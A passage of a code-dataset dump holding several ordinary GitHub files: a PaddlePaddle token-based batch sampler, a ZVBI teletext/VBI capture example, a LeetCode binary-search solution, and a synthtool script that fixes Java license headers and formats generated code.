rank\n self._frozen_batches = self._get_batches_by_max_tokens(indices)\n\n def __iter__(self):\n # get batches_indices shuffled by epoch+seed\n prev_epoch = self.epoch\n self.epoch+=1\n seed=self.common_seed + prev_epoch\n batches_indices=self._get_batches_for_epoch(seed=seed,shuffle=self.shuffle)\n _batch_iter = iter(batches_indices)\n\n for batch_indices in _batch_iter:\n yield batch_indices\n\n def __len__(self):\n return len(self._frozen_batches)\n\n def _get_batches_for_epoch(self, seed, shuffle):\n batches = self._frozen_batches.copy()\n if shuffle:\n np.random.RandomState(seed=seed).shuffle(batches) # 无返回值\n return batches\n\n def set_epoch(self, epoch):\n '''\n Sets the epoch number. When :attr:`shuffle=True`, this number is used\n as seeds of random numbers. 
By default, users may not set this, all\n replicas (workers) use a different random ordering for each epoch.\n If set same number at each epoch, this sampler will yield the same\n ordering at all epoches.\n '''\n self.epoch = epoch\n\n def _get_batches_by_max_tokens(self, indices):\n ''' get shard data by rank,no shuffle '''\n num_tokens_vec = num_tokens_vec_fn(indices, self.src_sizes, self.tgt_sizes)\n batches_indices = get_batches_indices(indices,\n num_tokens_vec=num_tokens_vec,\n max_tokens=self.max_tokens,\n max_sentences=self.max_sentences,\n bsz_factor=self.bsz_factor)\n\n # process last batch\n if self.drop_last and len(batches_indices[-1]) % self.bsz_factor != 0:\n batches_indices.pop()\n\n # subsample batches_indices for ranks\n if self.nranks > 1:\n local_batches_indices = []\n last_batches = len(batches_indices) % self.nranks # 多余的batch\n # 补全batches\n if last_batches > 0:\n batches_indices.extend(batches_indices[:(self.nranks - last_batches)])\n assert len(batches_indices) % self.nranks == 0 # 确保batch数是nrank的倍数\n\n # sabsample for each process\n for i in range(0, len(batches_indices), self.nranks):\n local_batches_indices.append(batches_indices[i])\n return local_batches_indices\n # single process\n return batches_indices", "repo_name": "jiaohuix/PaddleSeq", "sub_path": "paddleseq/reader/sampler.py", "file_name": "sampler.py", "file_ext": "py", "file_size_in_byte": 5176, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "paddle.io.BatchSampler", "line_number": 6, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 24, "usage_type": "call"}, {"api_name": "paddle.fluid.dygraph.parallel.ParallelEnv", "line_number": 40, "usage_type": "call"}, {"api_name": "paddle.fluid.dygraph.parallel.ParallelEnv", "line_number": 47, "usage_type": "call"}, {"api_name": "data_utils.ordered_indices", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.RandomState", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 76, "usage_type": "attribute"}, {"api_name": "data_utils.num_tokens_vec_fn", "line_number": 91, "usage_type": "call"}, {"api_name": "data_utils.get_batches_indices", "line_number": 92, "usage_type": "call"}]}
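The sampler record above delegates the actual grouping to data_utils.get_batches_indices, which is not shown. As a rough standalone sketch of the token-budget idea only (the function below and its batch-length-times-longest-sample cost model are my assumptions, not the repo's implementation):

def batch_by_tokens(indices, sizes, max_tokens, bsz_factor=1):
    # Group indices into batches whose padded cost -- batch length times the
    # longest sample in the batch -- stays within max_tokens; cut points are
    # rounded down to a multiple of bsz_factor, mirroring the class above.
    batches, cur, cur_max = [], [], 0
    for idx in indices:
        n = sizes[idx]
        if cur and (len(cur) + 1) * max(cur_max, n) > max_tokens:
            cut = max(1, (len(cur) // bsz_factor) * bsz_factor)
            batches.append(cur[:cut])
            cur = cur[cut:]
            cur_max = max((sizes[i] for i in cur), default=0)
        cur.append(idx)
        cur_max = max(cur_max, n)
    if cur:
        batches.append(cur)
    return batches

sizes = [7, 9, 8, 30, 31, 29, 12]
order = sorted(range(len(sizes)), key=sizes.__getitem__)  # length-sorted, like ordered_indices
print(batch_by_tokens(order, sizes, max_tokens=64))       # [[0, 2, 1, 6], [5, 3], [4]]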
+{"seq_id": "70867022249", "text": "import argparse\nimport sys\nimport re\nimport Zvbi\n\nopt = None\n\n#extern void\n#vbi_capture_set_log_fp (vbi_capture * capture,\n# FILE * fp)\n#extern vbi_bool vbi_capture_force_read_mode\n\n#\n# Dump\n#\n\ndef PIL(day, mon, hour, minute):\n return ((day << 15) + (mon << 11) + (hour << 6) + (minute << 0))\n\n\ndef dump_pil(pil):\n day = pil >> 15\n mon = (pil >> 11) & 0xF\n hour = (pil >> 6) & 0x1F\n minute = pil & 0x3F\n\n if pil == PIL(0, 15, 31, 63):\n print(\" PDC: Timer-control (no PDC)\")\n elif pil == PIL(0, 15, 30, 63):\n print(\" PDC: Recording inhibit/terminate\")\n elif pil == PIL(0, 15, 29, 63):\n print(\" PDC: Interruption\")\n elif pil == PIL(0, 15, 28, 63):\n print(\" PDC: Continue\")\n elif pil == PIL(31, 15, 31, 63):\n print(\" PDC: No time\")\n else:\n print(\" PDC: %05x, YYYY-%02d-%02d %02d:%02d\" %\n (pil, mon, day, hour, minute))\n\n\npr_label = \"\"\ntmp_label = \"\"\n\ndef decode_vps(buf):\n global pr_label\n global tmp_label\n\n if not opt.dump_vps:\n return\n\n print(\"\\nVPS:\")\n\n c = Zvbi.rev8(buf[1])\n\n if (c & 0x80):\n pr_label = tmp_label\n tmp_label = \"\"\n\n c &= 0x7F\n if (c >= 0x20) and (c < 0x7f):\n tmp_label += chr(c)\n else:\n tmp_label += '.'\n\n print(\" 3-10: %02x %02x %02x %02x %02x %02x %02x %02x (\\\"%s\\\")\" %\n (buf[0], buf[1], buf[2], buf[3], buf[4], buf[5], buf[6], buf[7], pr_label))\n\n pcs = buf[2] >> 6\n\n cni = ( ((buf[10] & 3) << 10)\n + ((buf[11] & 0xC0) << 2)\n + ((buf[8] & 0xC0) << 0)\n + (buf[11] & 0x3F))\n\n pil = ((buf[8] & 0x3F) << 14) + (buf[9] << 6) + (buf[10] >> 2)\n\n pty = buf[12]\n\n print(\" CNI: %04x PCS: %d PTY: %d \" % (cni, pcs, pty), end='')\n\n dump_pil(pil)\n\n\ndef decode_wss_625(buf):\n formats = (\n \"Full format 4:3, 576 lines\",\n \"Letterbox 14:9 centre, 504 lines\",\n \"Letterbox 14:9 top, 504 lines\",\n \"Letterbox 16:9 centre, 430 lines\",\n \"Letterbox 16:9 top, 430 lines\",\n \"Letterbox > 16:9 centre\",\n \"Full format 14:9 centre, 576 lines\",\n \"Anamorphic 16:9, 576 lines\"\n )\n subtitles = (\n \"none\",\n \"in active image area\",\n \"out of active image area\",\n \"\"\n )\n\n if opt.dump_wss:\n g1 = buf[0] & 15\n parity = g1\n parity ^= parity >> 2\n parity ^= parity >> 1\n g1 &= 7\n\n print(\"WSS PAL: \", end='')\n if not (parity & 1):\n print(\" \", end='')\n\n print((\"%s; %s mode; %s colour coding; %s helper; \"+\n \"reserved b7=%d; %s Teletext subtitles; \"+\n \"open subtitles: %s; %s surround sound; \"+\n \"copyright %s; copying %s\") %\n ( formats[g1],\n (\"film\" if (buf[0] & 0x10) else \"camera\"),\n (\"MA/CP\" if (buf[0] & 0x20) else \"standard\"),\n (\"modulated\" if (buf[0] & 0x40) else \"no\"),\n (buf[0] & 0x80) != 0,\n (\"have\" if (buf[1] & 0x01) else \"no\"),\n subtitles[(buf[1] >> 1) & 3],\n (\"have\" if (buf[1] & 0x08) else \"no\"),\n (\"asserted\" if (buf[1] & 0x10) else \"unknown\"),\n (\"restricted\" if (buf[1] & 0x20) else \"not restricted\")\n ))\n\n\ndef decode_wss_cpr1204(buf):\n if opt.dump_wss:\n poly = (1 << 6) + (1 << 1) + 1\n g = (buf[0] << 12) + (buf[1] << 4) + buf[2]\n crc = g | (((1 << 6) - 1) << (14 + 6))\n\n for j in range(14 + 6 - 1, -1, -1):\n if (crc & ((1 << 6) << j)):\n crc ^= poly << j\n\n print(\"WSS CPR >> g=%08x crc=%08x\" % (g, crc), file=sys.stderr)\n\n\ndef decode_sliced(sliced_buf):\n if opt.dump_sliced:\n print(\"Sliced time: %f\" % sliced_buf.timestamp)\n\n for data, slc_id, line in sliced_buf:\n print(\"%04x %3d > \" % (slc_id, line), end='')\n\n for d in data:\n print(\"%02x \" % d, end='')\n\n print(\" 
\", end='')\n\n astr = Zvbi.unpar_str(data, '.')\n astr = re.sub(r'[\\x00-\\x1F\\x7F]', '.', astr.decode('ISO-8859-1'))\n print(astr)\n\n for data, slc_id, line in sliced_buf:\n if slc_id == 0:\n pass # nop\n elif not (slc_id & Zvbi.VBI_SLICED_VPS) == 0:\n decode_vps(data)\n elif not (slc_id & Zvbi.VBI_SLICED_TELETEXT_B) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_CAPTION_525) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_CAPTION_625) == 0:\n pass # Use ./decode instead.\n elif not (slc_id & Zvbi.VBI_SLICED_WSS_625) == 0:\n decode_wss_625(data)\n elif not (slc_id & Zvbi.VBI_SLICED_WSS_CPR1204) == 0:\n decode_wss_cpr1204(data)\n else:\n print(\"Oops. Unhandled vbi service %08x\\n\" % slc_id, file=sys.stderr)\n\n#\n# Sliced, binary\n#\n\n# hysterical compatibility\nServiceWidth = {\n Zvbi.VBI_SLICED_TELETEXT_B: (42, 0),\n Zvbi.VBI_SLICED_CAPTION_625: (2, 1),\n Zvbi.VBI_SLICED_VPS: (13, 2),\n Zvbi.VBI_SLICED_WSS_625: (2, 3),\n Zvbi.VBI_SLICED_WSS_CPR1204: (3, 4),\n Zvbi.VBI_SLICED_CAPTION_525: (2, 7),\n}\n\nlast_ts = 0.0\n\ndef binary_sliced(sliced_buf):\n global last_ts\n\n ts = sliced_buf.timestamp - last_ts if (last_ts > 0.0) else 0.04\n outfile.write(bytes(\"%f\\n\" % ts, 'ascii'))\n\n outfile.write(bytes([len(sliced_buf)]))\n\n for data, slc_id, line in sliced_buf:\n if ServiceWidth.get(slc_id) and (ServiceWidth.get(slc_id)[0] > 0):\n outfile.write(bytes([ServiceWidth.get(slc_id)[1],\n line & 0xFF,\n line >> 8]))\n data_len = ServiceWidth.get(slc_id)[0]\n outfile.write(data[0 : data_len])\n last_ts = sliced_buf.timestamp\n\n outfile.flush()\n\n\ndef binary_ts_pes(packet, user_data=None):\n outfile.write(packet)\n outfile.flush()\n return 1\n\n\ndef mainloop(cap):\n dump = (opt.dump_wss or opt.dump_vps or opt.dump_sliced)\n err_cnt = 0\n\n while True:\n try:\n if opt.read:\n raw_buf, sliced_buf = cap.read(1000)\n else:\n raw_buf, sliced_buf = cap.pull(1000)\n err_cnt = 0\n except Zvbi.CaptureError as e:\n if not opt.ignore_error:\n print(\"Capture error:\", e, file=sys.stderr)\n err_cnt += 1 # ignore occasional singular errors\n if err_cnt >= 2:\n break\n continue\n except Zvbi.CaptureTimeout:\n if not opt.ignore_error:\n print(\"Capture timeout\", file=sys.stderr)\n continue\n\n if False:\n print(\".\", file=sys.stderr)\n sys.stderr.flush()\n\n if dump:\n decode_sliced(sliced_buf)\n\n if opt.sliced:\n binary_sliced(sliced_buf)\n\n if opt.pes or opt.ts:\n # XXX shouldn't use system time\n pts = int(sliced_buf.timestamp * 90000.0)\n services = (Zvbi.VBI_SLICED_TELETEXT_B |\n Zvbi.VBI_SLICED_VPS |\n Zvbi.VBI_SLICED_CAPTION_625 |\n Zvbi.VBI_SLICED_WSS_625)\n mx.feed(services, sliced_buf=sliced_buf, pts=pts)\n\n\n#static const char short_options[] = \"123cd:elnpr:stvPT\"\n\ndef ParseCmdOptions():\n global opt\n parser = argparse.ArgumentParser(description='ZVBI capturing example')\n parser.add_argument(\"--device\", type=str, default=\"/dev/dvb/adapter0/demux0\", help=\"Path to video capture device\") # dev_name,\n parser.add_argument(\"--pid\", type=int, default=0, help=\"Teletext channel PID for DVB\")\n parser.add_argument(\"--ignore-error\", action='store_true', default=False, help=\"Silently ignore device errors and timeout\")\n parser.add_argument(\"--dump-ttx\", action='store_true', default=False, help=\"Capture and dump teletext packets\")\n parser.add_argument(\"--dump-xds\", action='store_true', default=False, help=\"Capture and dump CC XDS packets\")\n parser.add_argument(\"--dump-cc\", action='store_true', default=False, 
help=\"Capture and dump CC packets\")\n parser.add_argument(\"--dump-wss\", action='store_true', default=False, help=\"Capture and dump WSS\")\n parser.add_argument(\"--dump-vps\", action='store_true', default=False, help=\"Capture and dump VPS data\")\n parser.add_argument(\"--dump-sliced\", action='store_true', default=False, help=\"Capture and all VBI services\")\n parser.add_argument(\"--pes\", action='store_true', default=False, help=\"Write output as PES DVB stream\") # bin_pes,\n parser.add_argument(\"--ts\", action='store_true', default=False, help=\"Write output as TS DVB stream\") # bin_ts,\n parser.add_argument(\"--sliced\", action='store_true', default=False, help=\"Write binary output, for piping into decode.py\") # bin_sliced,\n parser.add_argument(\"--read\", action='store_true', default=False, help=\"Use \\\"read\\\" capture method instead of \\\"pull\\\"\") # do_read,\n parser.add_argument(\"--strict\", type=int, default=0, help=\"Use strict mode 0,1,2 for adding VBI services\")\n #parser.add_argument(\"--desync\", action='store_true', default=False)\n #parser.add_argument(\"--sim\", action='store_true', default=False) # do_sim,\n parser.add_argument(\"--pal\", action='store_true', default=False, help=\"Assume PAL video norm (bktr driver only)\") # scanning_pal,\n parser.add_argument(\"--ntsc\", action='store_true', default=False, help=\"Assume NTSC video norm (bktr driver only)\") # scanning_ntsc,\n #parser.add_argument(\"--v4l\", action='store_true', default=False) # api_v4l,\n parser.add_argument(\"--v4l2\", action='store_true', default=False, help=\"Using analog driver interface\")\n #parser.add_argument(\"--v4l2-read\", action='store_true', default=False) # api_v4l2, # FIXME\n #parser.add_argument(\"--v4l2-mmap\", action='store_true', default=False) # api_v4l2, # FIXME\n parser.add_argument(\"--verbose\", action='store_true', default=False, help=\"Enable trace output in the library\")\n opt = parser.parse_args()\n\n if opt.v4l2 and (opt.pid != 0):\n print(\"Options --v4l2 and --pid are mutually exclusive\", file=sys.stderr)\n sys.exit(1)\n if not opt.v4l2 and (opt.pid == 0) and (\"dvb\" in opt.device):\n print(\"WARNING: DVB devices require --pid parameter\", file=sys.stderr)\n\n\ndef main_func():\n if opt.pal:\n scanning = 625\n elif opt.ntsc:\n scanning = 525\n else:\n scanning = 0\n\n dump = (opt.dump_wss or opt.dump_vps or opt.dump_sliced)\n\n if opt.dump_ttx or opt.dump_cc or opt.dump_xds:\n print(\"Teletext, CC and XDS decoding are no longer supported by this tool.\\n\" +\n \"Run ./capture --sliced | ./decode --ttx --cc --xds instead.\\n\", file=sys.stderr)\n exit(-1)\n\n if opt.sliced:\n if opt.pes or opt.ts or dump:\n print(\"WARNING: combining --sliced with --pes, --ts or --dump* will garble output\", file=sys.stderr)\n elif opt.pes or opt.ts:\n if opt.sliced or dump:\n print(\"WARNING: combining --pes/ts with --sliced or --dump* will garble output\", file=sys.stderr)\n\n services = (Zvbi.VBI_SLICED_VBI_525 |\n Zvbi.VBI_SLICED_VBI_625 |\n Zvbi.VBI_SLICED_TELETEXT_B |\n Zvbi.VBI_SLICED_CAPTION_525 |\n Zvbi.VBI_SLICED_CAPTION_625 |\n Zvbi.VBI_SLICED_VPS |\n Zvbi.VBI_SLICED_WSS_625 |\n Zvbi.VBI_SLICED_WSS_CPR1204)\n\n if False: #opt.sim:\n #TODO cap = Zvbi.sim_new (scanning, services, 0, !opt.desync)\n #par = cap.parameters()\n pass\n elif opt.v4l2 or (opt.pid == 0 and not \"dvb\" in opt.device):\n cap = Zvbi.Capture.Analog(opt.device, services=services, scanning=scanning,\n strict=opt.strict, trace=opt.verbose, buffers=5)\n par = cap.parameters()\n else:\n cap 
= Zvbi.Capture.Dvb(opt.device, dvb_pid=opt.pid, trace=opt.verbose)\n par = cap.parameters()\n\n if opt.verbose > 1:\n Zvbi.set_log_on_stderr(Zvbi.VBI_LOG_ERROR |\n Zvbi.VBI_LOG_WARNING |\n Zvbi.VBI_LOG_INFO)\n\n if opt.pid == -1:\n if par.sampling_format != Zvbi.VBI_PIXFMT_YUV420:\n print(\"Unexpected sampling format:%d in capture parameters\"\n % par.sampling_format, file=sys.stderr)\n exit(-1)\n\n global mx\n if opt.pes:\n mx = Zvbi.DvbMux(pes=True, callback=binary_ts_pes)\n mx.set_pes_packet_size (0, 8* 184)\n elif opt.ts:\n mx = Zvbi.DvbMux(ts_pid=999, callback=binary_ts_pes)\n mx.set_pes_packet_size (0, 8* 184)\n\n global outfile\n outfile = open(sys.stdout.fileno(), \"wb\")\n\n mainloop(cap)\n\n# main\ntry:\n ParseCmdOptions()\n main_func()\nexcept (KeyboardInterrupt, BrokenPipeError):\n pass\n", "repo_name": "tomzox/Python-ZVBI", "sub_path": "Video-ZVBI/examples/capture.py", "file_name": "capture.py", "file_ext": "py", "file_size_in_byte": 13041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "Zvbi.rev8", "line_number": 54, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 141, "usage_type": "attribute"}, {"api_name": "Zvbi.unpar_str", "line_number": 156, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 157, "usage_type": "call"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 163, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 165, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 167, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 169, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 173, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 176, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 184, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 185, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 186, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 187, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 188, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 189, "usage_type": "attribute"}, {"api_name": "Zvbi.CaptureError", "line_number": 231, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 233, "usage_type": "attribute"}, {"api_name": "Zvbi.CaptureTimeout", "line_number": 238, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 240, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 244, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 245, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 245, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 256, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 257, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 258, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 259, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 267, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 294, 
"usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 295, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 297, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 312, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 317, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 320, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VBI_525", "line_number": 322, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VBI_625", "line_number": 323, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_TELETEXT_B", "line_number": 324, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_525", "line_number": 325, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_CAPTION_625", "line_number": 326, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_VPS", "line_number": 327, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_625", "line_number": 328, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_SLICED_WSS_CPR1204", "line_number": 329, "usage_type": "attribute"}, {"api_name": "Zvbi.Capture.Analog", "line_number": 336, "usage_type": "call"}, {"api_name": "Zvbi.Capture", "line_number": 336, "usage_type": "attribute"}, {"api_name": "Zvbi.Capture.Dvb", "line_number": 340, "usage_type": "call"}, {"api_name": "Zvbi.Capture", "line_number": 340, "usage_type": "attribute"}, {"api_name": "Zvbi.set_log_on_stderr", "line_number": 344, "usage_type": "call"}, {"api_name": "Zvbi.VBI_LOG_ERROR", "line_number": 344, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_LOG_WARNING", "line_number": 345, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_LOG_INFO", "line_number": 346, "usage_type": "attribute"}, {"api_name": "Zvbi.VBI_PIXFMT_YUV420", "line_number": 349, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 351, "usage_type": "attribute"}, {"api_name": "Zvbi.DvbMux", "line_number": 356, "usage_type": "call"}, {"api_name": "Zvbi.DvbMux", "line_number": 359, "usage_type": "call"}, {"api_name": "sys.stdout.fileno", "line_number": 363, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 363, "usage_type": "attribute"}]}
+{"seq_id": "74144779369", "text": "#\n# @lc app=leetcode.cn id=74 lang=python3\n#\n# [74] 搜索二维矩阵\n#\n# https://leetcode-cn.com/problems/search-a-2d-matrix/description/\n#\n# algorithms\n# Medium (41.15%)\n# Total Accepted: 91.5K\n# Total Submissions: 220.7K\n# Testcase Example: '[[1,3,5,7],[10,11,16,20],[23,30,34,60]]\\n3'\n#\n# 编写一个高效的算法来判断 m x n 矩阵中,是否存在一个目标值。该矩阵具有如下特性:\n#\n#\n# 每行中的整数从左到右按升序排列。\n# 每行的第一个整数大于前一行的最后一个整数。\n#\n#\n#\n#\n# 示例 1:\n#\n#\n# 输入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 3\n# 输出:true\n#\n#\n# 示例 2:\n#\n#\n# ��入:matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 13\n# 输出:false\n#\n#\n#\n#\n# 提示:\n#\n#\n# m == matrix.length\n# n == matrix[i].length\n# 1\n# -10^4\n#\n#\n#\nfrom typing import List\n\n\nclass Solution:\n def searchMatrix0(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n l, r = 0, m * n - 1\n while l <= r:\n mid = (l + r) // 2\n i, j = divmod(mid, n)\n if target < matrix[i][j]:\n r = mid - 1\n elif target > matrix[i][j]:\n l = mid + 1\n else:\n return True\n return False\n\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n m, n = len(matrix), len(matrix[0])\n l, r = 0, m - 1\n while l <= r:\n mid = (l + r) // 2\n if target < matrix[mid][0]:\n r = mid - 1\n elif target > matrix[mid][-1]:\n l = mid + 1\n else:\n # 二分的跳出,以l<=r为条件,mid就是最终结果\n break\n row = mid\n l, r = 0, n - 1\n while l <= r:\n mid = (l + r) // 2\n if target < matrix[row][mid]:\n r = mid - 1\n elif target > matrix[row][mid]:\n l = mid + 1\n else:\n return True\n return False\n\n\n# matrix = [[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]]\n# matrix = [[1]]\n# target = 1\n\n# ret = Solution().searchMatrix(matrix, target)\n# print(ret)\n", "repo_name": "hedeqiang/leetcode-1", "sub_path": "python/74.search-a-2d-matrix.py", "file_name": "74.search-a-2d-matrix.py", "file_ext": "py", "file_size_in_byte": 2237, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.List", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 67, "usage_type": "name"}]}
+{"seq_id": "16093779050", "text": "import glob\nimport sys\nimport os\nimport re\nimport synthtool as s\nimport synthtool.gcp as gcp\nfrom pathlib import Path\nfrom synthtool.log import logger\nfrom synthtool import shell\n\nDEFAULT_FORMAT_VERSION = \"1.7\"\nGOOD_LICENSE = \"\"\"\n/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * https://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\"\"\"\nPROTOBUF_HEADER = \"// Generated by the protocol buffer compiler. DO NOT EDIT!\"\nBAD_LICENSE = \"\"\"/\\\\*\n \\\\* Copyright \\\\d{4} Google LLC\n \\\\*\n \\\\* Licensed under the Apache License, Version 2.0 \\\\(the \"License\"\\\\); you may not use this file except\n \\\\* in compliance with the License. You may obtain a copy of the License at\n \\\\*\n \\\\* http://www.apache.org/licenses/LICENSE-2.0\n \\\\*\n \\\\* Unless required by applicable law or agreed to in writing, software distributed under the License\n \\\\* is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express\n \\\\* or implied. See the License for the specific language governing permissions and limitations under\n \\\\* the License.\n \\\\*/\n\"\"\"\n\nimport time\n\ndef format_code(path: str, times: int = 2) -> None:\n \"\"\"\n Runs the google-java-format jar against all .java files found within the\n provided path.\n \"\"\"\n # Find all .java files in path and run the formatter on them\n files = list(glob.iglob(os.path.join(path, \"**/*.java\"), recursive=True))\n\n # Run the formatter as a jar file\n logger.info(\"Running java formatter on {} files\".format(len(files)))\n formatter_binary = sys.argv[2]\n for _ in range(times):\n shell.run([formatter_binary, \"--replace\"] + files)\n\ndef fix_proto_headers(proto_root: Path) -> None:\n s.replace(\n [proto_root / \"src/**/*.java\"],\n PROTOBUF_HEADER,\n f\"{GOOD_LICENSE}{PROTOBUF_HEADER}\",\n )\n # https://github.com/googleapis/gapic-generator/issues/3074\n s.replace(\n [proto_root / \"src/**/*Name.java\", proto_root / \"src/**/*Names.java\"],\n BAD_LICENSE,\n GOOD_LICENSE,\n )\n\n\ndef fix_grpc_headers(grpc_root: Path, package_name: str) -> None:\n s.replace(\n [grpc_root / \"src/**/*.java\"], \"^package (.*);\", f\"{GOOD_LICENSE}package \\\\1;\",\n )\n\ndef _common_generation(\n service: str,\n version: str,\n library: Path,\n package_pattern: str,\n suffix: str = \"\",\n destination_name: str = None,\n cloud_api: bool = True,\n diregapic: bool = False,\n):\n \"\"\"Helper function to execution the common generation cleanup actions.\n\n Fixes headers for protobuf classes and generated gRPC stub services. Copies\n code and samples to their final destinations by convention. Runs the code\n formatter on the generated code.\n\n Args:\n service (str): Name of the service.\n version (str): Service API version.\n library (Path): Path to the temp directory with the generated library.\n package_pattern (str): Package name template for fixing file headers.\n suffix (str, optional): Suffix that the generated library folder. 
The\n artman output differs from bazel's output directory. Defaults to \"\".\n destination_name (str, optional): Override the service name for the\n destination of the output code. Defaults to the service name.\n \"\"\"\n\n if destination_name is None:\n destination_name = service\n\n cloud_prefix = \"cloud-\" if cloud_api else \"\"\n package_name = package_pattern.format(service=service, version=version)\n fix_proto_headers(\n library / f\"proto-google-{cloud_prefix}{service}-{version}{suffix}\"\n )\n fix_grpc_headers(\n library / f\"grpc-google-{cloud_prefix}{service}-{version}{suffix}\", package_name\n )\n\n s.copy(\n [library / f\"gapic-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"google-{cloud_prefix}{destination_name}/src\",\n required=True,\n )\n s.copy(\n [library / f\"grpc-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"grpc-google-{cloud_prefix}{destination_name}-{version}/src\",\n # For REST-only clients, like java-compute, gRPC artifact does not exist\n required=(not diregapic),\n )\n s.copy(\n [library / f\"proto-google-{cloud_prefix}{service}-{version}{suffix}/src\"],\n f\"proto-google-{cloud_prefix}{destination_name}-{version}/src\",\n required=True,\n )\n\n format_code(f\"google-{cloud_prefix}{destination_name}/src\")\n format_code(f\"grpc-google-{cloud_prefix}{destination_name}-{version}/src\", 1)\n format_code(f\"proto-google-{cloud_prefix}{destination_name}-{version}/src\", 1)\n\n\ndef bazel_library(\n service: str,\n version: str,\n package_pattern: str = \"com.google.cloud.{service}.{version}\",\n gapic: gcp.GAPICBazel = None,\n destination_name: str = None,\n cloud_api: bool = True,\n diregapic: bool = False,\n **kwargs,\n) -> Path:\n \"\"\"Generate a Java library using the gapic-generator via bazel.\n\n Generates code into a temp directory, fixes missing header fields, and\n copies into the expected locations.\n\n Args:\n service (str): Name of the service.\n version (str): Service API version.\n package_pattern (str, optional): Package name template for fixing file\n headers. Defaults to \"com.google.cloud.{service}.{version}\".\n gapic (GAPICBazel, optional): Generator instance.\n destination_name (str, optional): Override the service name for the\n destination of the output code. Defaults to the service name.\n **kwargs: Additional options for gapic.java_library()\n\n Returns:\n The path to the temp directory containing the generated client.\n \"\"\"\n if gapic is None:\n gapic = gcp.GAPICBazel()\n\n library = gapic.java_library(\n service=service, version=version, diregapic=diregapic, **kwargs\n )\n\n cloud_prefix = \"cloud-\" if cloud_api else \"\"\n _common_generation(\n service=service,\n version=version,\n library=library / f\"google-{cloud_prefix}{service}-{version}-java\",\n 